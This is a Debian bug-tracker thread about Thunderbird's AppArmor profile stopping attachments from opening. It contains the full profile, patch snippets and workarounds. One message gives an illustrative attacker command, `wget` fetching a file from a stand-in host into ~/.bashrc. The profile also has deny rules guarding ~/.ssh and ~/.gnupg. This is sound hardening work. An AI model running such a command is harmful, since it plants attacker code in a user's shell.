Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced

128 views
Skip to first unread message

Kevin Keijzer

unread,
Feb 16, 2017, 7:00:02 PM2/16/17
to
Package: thunderbird
Version: 1:45.7.1-1
Severity: normal

The Thunderbird AppArmor profile breaks the ability to open attachments
directly. (Saving them is possible.)

For instance, when attempting to open an attached .png by selecting 'Open with
Image Viewer', /usr/bin/eog fails to launch:

audit: type=1400 audit(1487288200.755:153): apparmor="DENIED" operation="exec"
profile="thunderbird" name="/usr/bin/eog" pid=5668 comm="thunderbird"
requested_mask="x" denied_mask="x" fsuid=1000 ouid=0

Instead, a file type association prompt is shown, which doesn't do anything
useful.

Similar warnings are shown for /usr/bin/evince (.pdf), /usr/bin/file-roller
(.tar.gz) and /usr/lib/libreoffice/program/soffice (.odt), but for some reason
I am able to open .txt files with /usr/bin/gedit without issues.



-- System Information:
Debian Release: 9.0
APT prefers testing
APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=nl_NL.UTF-8, LC_CTYPE=nl_NL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages thunderbird depends on:
ii debianutils 4.8.1
ii fontconfig 2.11.0-6.7
ii libasound2 1.1.3-4
ii libatk1.0-0 2.22.0-1
ii libc6 2.24-9
ii libcairo2 1.14.8-1
ii libdbus-1-3 1.10.14-1
ii libdbus-glib-1-2 0.108-2
ii libevent-2.0-5 2.0.21-stable-2.1
ii libffi6 3.2.1-6
ii libfontconfig1 2.11.0-6.7
ii libfreetype6 2.6.3-3+b1
ii libgcc1 1:6.3.0-6
ii libgdk-pixbuf2.0-0 2.36.4-1
ii libglib2.0-0 2.50.2-2
ii libgtk2.0-0 2.24.31-2
ii libhunspell-1.4-0 1.4.1-2+b1
ii libicu57 57.1-5
ii libnspr4 2:4.12-6
ii libnss3 2:3.26.2-1
ii libpango-1.0-0 1.40.3-3
ii libpangocairo-1.0-0 1.40.3-3
ii libpangoft2-1.0-0 1.40.3-3
ii libpixman-1-0 0.34.0-1
ii libsqlite3-0 3.16.2-2
ii libstartup-notification0 0.12-4
ii libstdc++6 6.3.0-6
ii libvpx4 1.6.1-2
ii libx11-6 2:1.6.4-3
ii libxcomposite1 1:0.4.4-2
ii libxdamage1 1:1.1.4-2+b1
ii libxext6 2:1.3.3-1
ii libxfixes3 1:5.0.3-1
ii libxrender1 1:0.9.10-1
ii libxt6 1:1.1.5-1
ii psmisc 22.21-2.1+b1
ii zlib1g 1:1.2.8.dfsg-5

Versions of packages thunderbird recommends:
ii hunspell-en-us [hunspell-dictionary] 20070829-7
ii hunspell-nl [hunspell-dictionary] 1:5.2.5-1
pn lightning <none>

Versions of packages thunderbird suggests:
ii apparmor 2.11.0-2
pn fonts-lyx <none>
ii libgssapi-krb5-2 1.15-1

-- Configuration Files:
/etc/apparmor.d/usr.bin.thunderbird changed:
@{MOZ_LIBDIR}=/usr/lib/thunderbird
profile thunderbird /usr/lib/thunderbird/thunderbird {
#include <abstractions/audio>
#include <abstractions/aspell>
#include <abstractions/cups-client>
# TODO: finetune this for required accesses
#include <abstractions/dbus>
#include <abstractions/dbus-accessibility>
#include <abstractions/dbus-session>
#include <abstractions/gnome>
#include <abstractions/ibus>
#include <abstractions/nameservice>
#include <abstractions/p11-kit>
#include <abstractions/private-files>
#include <abstractions/ssl_certs>
#include <abstractions/ubuntu-browsers>
#include <abstractions/ubuntu-helpers>
# For Xubuntu to launch the browser
/usr/bin/exo-open ixr,
/usr/lib/@{multiarch}/xfce4/exo-1/exo-helper-1 ixr,
/etc/xdg/xdg-xubuntu/xfce4/helpers.rc r,
/etc/xdg/xfce4/helpers.rc r,
# for crash reports?
ptrace (read,trace) peer=@{profile_name},
/usr/lib/thunderbird/thunderbird ixr,
# Pulseaudio
/usr/bin/pulseaudio Pixr,
owner @{HOME}/.{cache,config}/dconf/user rw,
owner /run/user/[0-9]*/dconf/user rw,
owner @{HOME}/.config/gtk-3.0/bookmarks r,
deny owner @{HOME}/.local/share/gvfs-metadata/* r,
# potentially extremely sensitive files
audit deny @{HOME}/.gnupg/** mrwkl,
audit deny @{HOME}/.ssh/** mrwkl,
# rw access to HOME is useful when sending/receiving attachments
owner @{HOME}/** rw,
# Required for LVM setups
/sys/devices/virtual/block/dm-[0-9]*/uevent r,
# Addons (too lax for thunderbird)
##include <abstractions/ubuntu-browsers.d/firefox>
# for networking
network inet stream,
network inet6 stream,
@{PROC}/[0-9]*/net/if_inet6 r,
@{PROC}/[0-9]*/net/ipv6_route r,
@{PROC}/[0-9]*/net/dev r,
@{PROC}/[0-9]*/net/wireless r,
# should maybe be in abstractions
/etc/ r,
/etc/mime.types r,
/etc/mailcap r,
/etc/xdg/*buntu/applications/defaults.list r, # for all derivatives
/etc/xfce4/defaults.list r,
/usr/share/xubuntu/applications/defaults.list r,
owner @{HOME}/.local/share/applications/defaults.list r,
owner @{HOME}/.local/share/applications/mimeapps.list r,
owner @{HOME}/.local/share/applications/mimeinfo.cache r,
owner /tmp/** m,
owner /var/tmp/** m,
/tmp/.X[0-9]*-lock r,
/etc/udev/udev.conf r,
# Doesn't seem to be required, but noisy. Maybe allow 'r' for 'b*' if needed.
# Possibly move to an abstraction if anything else needs it.
deny /run/udev/data/** r,
/etc/timezone r,
/etc/wildmidi/wildmidi.cfg r,
# thunderbird specific
/etc/thunderbird/ r,
/etc/thunderbird/** r,
/etc/xul-ext/** r,
/etc/xulrunner-2.0*/ r,
/etc/xulrunner-2.0*/** r,
/etc/gre.d/ r,
/etc/gre.d/* r,
# noisy
deny @{MOZ_LIBDIR}/** w,
deny /usr/lib/thunderbird-addons/** w,
deny /usr/lib/xulrunner-addons/** w,
deny /usr/lib/xulrunner-*/components/*.tmp w,
deny /.suspended r,
deny /boot/initrd.img* r,
deny /boot/vmlinuz* r,
deny /var/cache/fontconfig/ w,
deny @{HOME}/.local/share/recently-used.xbel r,
deny @{HOME}/.* r,
# TODO: investigate
deny /usr/bin/gconftool-2 x,
owner @{PROC}/[0-9]*/mountinfo r,
owner @{PROC}/[0-9]*/stat r,
owner @{PROC}/[0-9]*/task/[0-9]*/stat r,
/sys/devices/pci[0-9]*/**/uevent r,
/etc/mtab r,
/etc/fstab r,
# Needed for the crash reporter
owner @{PROC}/[0-9]*/environ r,
owner @{PROC}/[0-9]*/auxv r,
/etc/lsb-release r,
/usr/bin/expr ix,
/sys/devices/system/cpu/ r,
/sys/devices/system/cpu/** r,
# about:memory
owner @{PROC}/[0-9]*/statm r,
owner @{PROC}/[0-9]*/smaps r,
# Needed for container to work in xul builds
/usr/lib/xulrunner-*/plugin-container ixr,
# allow access to documentation and other files the user may want to look
# at in /usr and /opt
/usr/ r,
/usr/** r,
/opt/ r,
/opt/** r,
# so browsing directories works
/ r,
/**/ r,
# per-user thunderbird configuration
owner @{HOME}/.thunderbird/ rw,
owner @{HOME}/.thunderbird/** rw,
owner @{HOME}/.thunderbird/**/storage.sdb k,
owner @{HOME}/.thunderbird/**/*.{db,parentlock,sqlite}* k,
owner @{HOME}/.thunderbird/plugins/** rm,
owner @{HOME}/.thunderbird/**/plugins/** rm,
owner @{HOME}/.cache/thunderbird/ rw,
owner @{HOME}/.cache/thunderbird/** rw,
# system emails
owner /var/mail/* rwlk,
#
# Extensions
# /usr/share/.../extensions/... is already covered by '/usr/** r', above.
# Allow 'x' for downloaded extensions, but inherit policy for safety
owner @{HOME}/.thunderbird/**/extensions/** mixrw,
owner @{HOME}/.mozilla/extensions/** mixr,
/usr/share/xul-ext/**/*.sqlite rk,
/usr/lib/xul-ext/**/*.sqlite rk,
/usr/lib/thunderbird-addons/extensions/**/*.sqlite rk,
deny @{MOZ_LIBDIR}/update.test w,
deny /usr/lib/mozilla/extensions/**/ w,
deny /usr/lib/xulrunner-addons/extensions/**/ w,
deny /usr/share/mozilla/extensions/**/ w,
deny /usr/share/mozilla/ w,
# Miscellaneous (to be abstracted)
# Ideally these would use a child profile. They are all ELF executables
# so running with 'Ux', while not ideal, is ok because we will at least
# benefit from glibc's secure execute.
/usr/bin/mkfifo Uxr, # investigate
/bin/ps Uxr,
/bin/uname Uxr,
/usr/bin/locale Uxr,
/usr/bin/gpg Cx -> gpg,
profile gpg {
#include <abstractions/base>
# Required to import keys from keyservers
#include <abstractions/nameservice>
#include <abstractions/p11-kit>
/usr/share/xul-ext/enigmail/chrome/enigmail.jar r,
# For smartcards?
/dev/bus/usb/ r,
/dev/bus/usb/[0-9]*/ r,
/dev/bus/usb/[0-9]*/[0-9]* r,
# LDAP key servers
/etc/ldap/ldap.conf r,
/usr/bin/gpg mr,
/usr/lib/gnupg/gpgkeys_* ix,
owner @{HOME}/.gnupg r,
owner @{HOME}/.gnupg/gpg.conf r,
owner @{HOME}/.gnupg/random_seed rwk,
owner @{HOME}/.gnupg/pubring.gpg{,~} rw,
owner @{HOME}/.gnupg/secring.gpg rw,
owner @{HOME}/.gnupg/trustdb.gpg rw,
owner @{HOME}/.gnupg/*.gpg.{lock,tmp} rwl,
owner @{HOME}/.gnupg/.#*[0-9] rw,
owner @{HOME}/.gnupg/.#*[0-9]x rwl,
owner @{HOME}/** r,
owner /run/user/[0-9]*/keyring-*/gpg rw,
# for inline pgp
owner /tmp/encfile rw,
owner /tmp/encfile-[0-9]* rw,
}
/usr/bin/gpg2 Cx -> gpg2,
/usr/bin/gpgconf Cx -> gpg2,
/usr/bin/gpg-connect-agent Cx -> gpg2,
# TB tries to create this file but has no business doing so
deny @{HOME}/.gnupg/gpg-agent.conf w,
profile gpg2 {
#include <abstractions/base>
# Required to import keys from keyservers
#include <abstractions/nameservice>
#include <abstractions/p11-kit>
/usr/lib/gnupg2/gpg2keys_hkp ix,
# silence noise from enigmail 1.9+
deny owner @{HOME}/.thunderbird/*/.parentlock w,
deny owner @{HOME}/.thunderbird/*/panacea.dat w,
deny owner @{HOME}/.thunderbird/*/*.mab w,
deny owner @{HOME}/.thunderbird/**/*.msf w,
deny owner @{HOME}/.cache/thunderbird/**/_CACHE_* w,
/usr/share/xul-ext/enigmail/chrome/enigmail.jar r,
# For smartcards?
/dev/bus/usb/ r,
/dev/bus/usb/[0-9]*/ r,
/dev/bus/usb/[0-9]*/[0-9]* r,
# LDAP key servers
/etc/ldap/ldap.conf r,
/usr/bin/gpg-connect-agent mr,
owner @{HOME}/.gnupg/S.gpg-agent rw,
owner @{HOME}/.gnupg/S.dirmngr rw,
/usr/bin/gpg2 mr,
owner @{HOME}/.gnupg/ rw,
owner @{HOME}/.gnupg/gpg.conf r,
owner @{HOME}/.gnupg/random_seed rwk,
owner @{HOME}/.gnupg/pubring.gpg{,~} rw,
owner @{HOME}/.gnupg/secring.gpg rw,
owner @{HOME}/.gnupg/trustdb.gpg rw,
owner @{HOME}/.gnupg/*.gpg.{lock,tmp} rwl,
owner @{HOME}/.gnupg/.gpg-*.lock rwl,
owner @{HOME}/.gnupg/gnupg_spawn_*.lock rwl,
owner @{HOME}/.gnupg/.#lk0x[0-9a-f]* rwl,
owner @{HOME}/.gnupg/.gpg-v[0-9]*-migrated rw,
owner @{HOME}/** r,
owner @{PROC}/@{pids}/mountinfo r,
# for inline pgp
owner /tmp/encfile rw,
owner /tmp/encfile-[0-9]* rw,
# for signature generation
owner /tmp/nsemail.eml w,
owner /tmp/nsemail-[0-9]*.eml w,
# for signature verifications
owner /tmp/data.sig r,
owner /tmp/data-[0-9]*.sig r,
owner /tmp/gpg-[a-zA-Z0-9]*/S.gpg-agent rw,
}
# Site-specific additions and overrides. See local/README for details.
#include <local/usr.bin.thunderbird>
}


-- no debconf information

Vincas Dargis

unread,
Oct 24, 2017, 12:40:03 PM10/24/17
to
I've started to work on patch on comment #60. Notifying to avoid work duplication.

Vincas Dargis

unread,
Oct 24, 2017, 2:00:03 PM10/24/17
to
Patch snippet:

+ # Allow opening attachments
+ /{usr/,}bin/* Cx -> sanitized_helper,
+ /{usr/,}sbin/* Cx -> sanitized_helper,
+ /usr/local/{bin,sbin}/* Cx -> sanitized_helper,
+ /usr/lib/libreoffice/program/soffice Cxr -> sanitized_helper,
+ /usr/bin/evince Pix,
+ /usr/bin/totem Pix,

Do we really need sbin? I kind doubt there will be "document viewers", and it has setuid applications like pppd and
exim4, which is not comforting.

Also, if sanitized_helper contains:

`/{usr/,}bin/* Pixr,`

Doesn't this automatically mean that this line in usr.bin.thunderbird profile

`/{usr/,}bin/* Cx -> sanitized_helper,`

will in result launch /usr/bin/totem with it's *P*rofile?

I wonder, because `abstractions/ubuntu-media-players has `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?

I'll do some testing tomorrow. If there's extra rules for XFCE, maybe I should try Thunderbird on several DE.

intrigeri

unread,
Oct 25, 2017, 3:50:03 AM10/25/17
to
Hi Vincas,

Vincas Dargis:
> + # Allow opening attachments
> + /{usr/,}bin/* Cx -> sanitized_helper,
> + /{usr/,}sbin/* Cx -> sanitized_helper,
> + /usr/local/{bin,sbin}/* Cx -> sanitized_helper,
> + /usr/bin/evince Pix,
> + /usr/bin/totem Pix,

[...]

> Do we really need sbin? I kind doubt there will be "document viewers", and it has
> setuid applications like pppd and exim4, which is not comforting.

Good catch! Makes sense to me, feel free to drop the sbin bits as long
as it does not obviously break stuff in your tests :)

> Also, if sanitized_helper contains:

> `/{usr/,}bin/* Pixr,`

> Doesn't this automatically mean that this line in usr.bin.thunderbird profile

> `/{usr/,}bin/* Cx -> sanitized_helper,`

> will in result launch /usr/bin/totem with it's *P*rofile?

> I wonder, because `abstractions/ubuntu-media-players has `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?
> I'll do some testing tomorrow.

Indeed, it might be that the specific rules about evince & totem
you're quoting from my patch above are not needed. It would be nice if
we could drop them (and the maintenance cost of hard-coding a list of
exceptions) so I'm hoping your testing confirms your hypothesis :)

> If there's extra rules for XFCE, maybe I should try Thunderbird on several DE.

This would be sweet but right now the thing is totally broken, so
fixing them on the default DE (GNOME) only would be a huge improvement
already. I suggest you focus on getting this done first, and later we
can test (or call for testing!) on other DEs. There's no way we can
test all relevant configurations, so we'll need to rely on user
testing to some degree anyway.

Cheers,
--
intrigeri

Vincas Dargis

unread,
Oct 25, 2017, 12:00:02 PM10/25/17
to
On 2017.10.25 10:26, intrigeri wrote:
> Indeed, it might be that the specific rules about evince & totem
> you're quoting from my patch above are not needed. It would be nice if
> we could drop them (and the maintenance cost of hard-coding a list of
> exceptions) so I'm hoping your testing confirms your hypothesis :)

Yes I am going to test multiple format attachements just now.

>> If there's extra rules for XFCE, maybe I should try Thunderbird on several DE.
>
> This would be sweet but right now the thing is totally broken, so
> fixing them on the default DE (GNOME) only would be a huge improvement
> already. I suggest you focus on getting this done first, and later we
> can test (or call for testing!) on other DEs. There's no way we can
> test all relevant configurations, so we'll need to rely on user
> testing to some degree anyway.

OK if we call this urgent, we do as such. Personally, I would like to have bunch of abstractions to contain all image,
document viewers, editors and what not, so that browsers, email clients and IM's could include them (or one big
proxy-policy file that includes all these grouped -browsers -editors -viewers) and so have more restrictive policy. With
pending patch, some Thunderbird exploit needs just execute `wget -O ~/.bashrc http://cracr.io:1337/own` and it's end
game. But let's fix this critical broken stuff and do the right way later.

intrigeri

unread,
Oct 25, 2017, 1:30:02 PM10/25/17
to
Vincas Dargis:
> On 2017.10.25 10:26, intrigeri wrote:
>> Indeed, it might be that the specific rules about evince & totem
>> you're quoting from my patch above are not needed. It would be nice if
>> we could drop them (and the maintenance cost of hard-coding a list of
>> exceptions) so I'm hoping your testing confirms your hypothesis :)

> Yes I am going to test multiple format attachements just now.

Amazing! :)

> Personally, I would like to have bunch of abstractions to contain
> all image, document viewers, editors and what not, […]

I'm not looking forward to maintaining these abstractions.

> With pending patch, some Thunderbird exploit needs just execute
> `wget -O ~/.bashrc http://cracr.io:1337/own` and it's end game.

Right. Sadly, the other currently available option is what we have
now: breaking critical stuff in a way that encourages people to fully
disable AppArmor and open a bunch of other holes in their system (by
disabling all confinement for all other apps). This is exactly what
I've been trying to avoid in the last years while working on AppArmor
in Debian, and I'm sad we're shipping an AppArmor profile that breaks
basic functionality here.

> But let's fix this critical broken stuff and do the right way later.

ACK, glad we're on the same page :)

[Now, if we want to talk about the right way, I doubt it'll be with
AppArmor: Flatpak and friends finally tackle the problems AppArmor
can't solve for GUI apps.]

Cheers,
--
intrigeri

Vincas Dargis

unread,
Oct 25, 2017, 3:30:02 PM10/25/17
to
On 2017.10.25 10:26, intrigeri wrote:
>> Also, if sanitized_helper contains:
>
>> `/{usr/,}bin/* Pixr,`
>
>> Doesn't this automatically mean that this line in usr.bin.thunderbird profile
>
>> `/{usr/,}bin/* Cx -> sanitized_helper,`
>
>> will in result launch /usr/bin/totem with it's *P*rofile?
>
>> I wonder, because `abstractions/ubuntu-media-players has `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?
>> I'll do some testing tomorrow.
>
> Indeed, it might be that the specific rules about evince & totem
> you're quoting from my patch above are not needed. It would be nice if
> we could drop them (and the maintenance cost of hard-coding a list of
> exceptions) so I'm hoping your testing confirms your hypothesis :)

Strange, preliminary test shows that totem is launched with it's profile, meanwhile evince is launched via
thunderbird//sanitized_helper for unknown reason. I need to test some more.

And totem does not even show it's GUI in new fresh Debian Sid GNOME. Maybe it needs patches you are proposing upstream.

Simon Deziel

unread,
Oct 25, 2017, 3:40:03 PM10/25/17
to
On 2017-10-25 03:08 PM, Vincas Dargis wrote:
> On 2017.10.25 10:26, intrigeri wrote:
>>> Also, if sanitized_helper contains:
>>
>>> `/{usr/,}bin/* Pixr,`
>>
>>> Doesn't this automatically mean that this line in usr.bin.thunderbird
>>> profile
>>
>>> `/{usr/,}bin/* Cx -> sanitized_helper,`
>>
>>> will in result launch /usr/bin/totem with it's *P*rofile?
>>
>>> I wonder, because `abstractions/ubuntu-media-players has
>>> `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?
>>> I'll do some testing tomorrow.
>>
>> Indeed, it might be that the specific rules about evince & totem
>> you're quoting from my patch above are not needed. It would be nice if
>> we could drop them (and the maintenance cost of hard-coding a list of
>> exceptions) so I'm hoping your testing confirms your hypothesis :)
>
> Strange, preliminary test shows that totem is launched with it's
> profile, meanwhile evince is launched via thunderbird//sanitized_helper
> for unknown reason. I need to test some more.

It's been that way for a long time, see [1].

Regards,
Simon

[1] https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1042771

signature.asc

Vincas Dargis

unread,
Oct 26, 2017, 11:40:02 AM10/26/17
to
On 2017.10.25 22:25, Simon Deziel wrote:
>> Strange, preliminary test shows that totem is launched with it's
>> profile, meanwhile evince is launched via thunderbird//sanitized_helper
>> for unknown reason. I need to test some more.
>
> It's been that way for a long time, see [1].
>
> Regards,
> Simon
>
> [1] https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1042771
>

Thanks for the info. Not sure why it's Low priority, if it renders abstractions (ubuntu-{browsers,..}) that use
sanitized_helper kinda-almost-useless?

intrigeri

unread,
Oct 27, 2017, 5:40:02 AM10/27/17
to
Control: tag -1 + fixed-upstream

Thanks to Vincas this was fixed upstream:
https://git.launchpad.net/apparmor-profiles/tree/ubuntu/17.10/usr.bin.thunderbird

Carsten, could you please pull this updated profile?

Cheers,
--
intrigeri

Cyrille Chépélov

unread,
Nov 21, 2017, 7:40:04 AM11/21/17
to
|found|855346 1:52.4.0-1
fixed 855346 1:52.4.0-2~exp1


Greetings,

been hit with the same issue (GNOME 3.26 environment), and while I can't
comment on what apparmor-ing was expected to achieve, the experimental
version does fix the "can't open attachments" issue for me.

Thanks!

    -- Cyrille

Massimo Maiurana

unread,
Dec 7, 2017, 4:10:03 PM12/7/17
to
I can confirm that I'm experiencing this bug now, after a recent upgrade
two days ago.
I can't open attachments anymore but I'm still able to save them.
Running thunderbird from a console I can see that it complain about
missing permissions, even for just opening recently-used.xbel

--
Massimo Maiurana
Ragusa (RG)

Massimo Maiurana

unread,
Dec 8, 2017, 7:30:03 AM12/8/17
to
On Thu, 7 Dec 2017 21:59:28 +0100 Massimo Maiurana <maiu...@gmail.com>
wrote:
> I can confirm that I'm experiencing this bug now, after a recent upgrade
> two days ago.

Solved for now replacing the current apparmor profile with the one in
message #126, at least I can open attachments again until a proper fix
is pull upstream.

Paolo Inaudi

unread,
Dec 8, 2017, 8:10:03 AM12/8/17
to
Profile from #126 still doesn't allow to open links in Firefox:

dic 08 14:06:43 paolo-desktop audit[19990]: AVC apparmor="DENIED"
operation="exec" profile="thunderbird" name="/usr/lib/firefox/firefox"
pid=19990 comm="thunderbird" requested_mask="x" denied_mask="x"
fsuid=1000 ouid=0

Paolo Inaudi

On Fri, 8 Dec 2017 13:22:56 +0100 Massimo Maiurana <maiu...@gmail.com>

Massimo Maiurana

unread,
Dec 8, 2017, 8:20:03 AM12/8/17
to
Paolo Inaudi ha scritto il 08/12/2017 alle 14:08:
> Profile from #126 still doesn't allow to open links in Firefox:
>

Here it does, I just opened a link ina a message as a new tab in
firefox. Don't know why though.

Tim Rühsen

unread,
Jan 5, 2018, 4:10:03 AM1/5/18
to
On Fri, 8 Dec 2017 14:08:13 +0100 Paolo Inaudi <p91...@gmail.com> wrote:
> Profile from #126 still doesn't allow to open links in Firefox:
>
> dic 08 14:06:43 paolo-desktop audit[19990]: AVC apparmor="DENIED"
> operation="exec" profile="thunderbird" name="/usr/lib/firefox/firefox"
> pid=19990 comm="thunderbird" requested_mask="x" denied_mask="x"
> fsuid=1000 ouid=0

Same problem here on latest Debian unstable.

Fix / Work-around:

Add
/usr/lib/firefox/firefox ixr,
to
/etc/apparmor.d/usr.bin.thunderbird
and execute
service apparmor reload

Not sure why /usr/bin/firefox is a symlink to /usr/lib/firefox/firefox
and if it has something to do with our problem.

Regards, Tim

signature.asc

intrigeri

unread,
Jan 7, 2018, 6:10:03 AM1/7/18
to
Tim Rühsen:
> On Fri, 8 Dec 2017 14:08:13 +0100 Paolo Inaudi <p91...@gmail.com> wrote:
>> Profile from #126 still doesn't allow to open links in Firefox:
>>
>> dic 08 14:06:43 paolo-desktop audit[19990]: AVC apparmor="DENIED"
>> operation="exec" profile="thunderbird" name="/usr/lib/firefox/firefox"
>> pid=19990 comm="thunderbird" requested_mask="x" denied_mask="x"
>> fsuid=1000 ouid=0

> Same problem here on latest Debian unstable.

Thanks for your feedback.

I believe I've fixed this upstream in AppArmor itself:
https://gitlab.com/apparmor/apparmor/commit/ff66ca90390d14fa710ac28cc20728f934152724
… which will make it into Debian once we package AppArmor 2.12.

Cheers,
--
intrigeri
0 new messages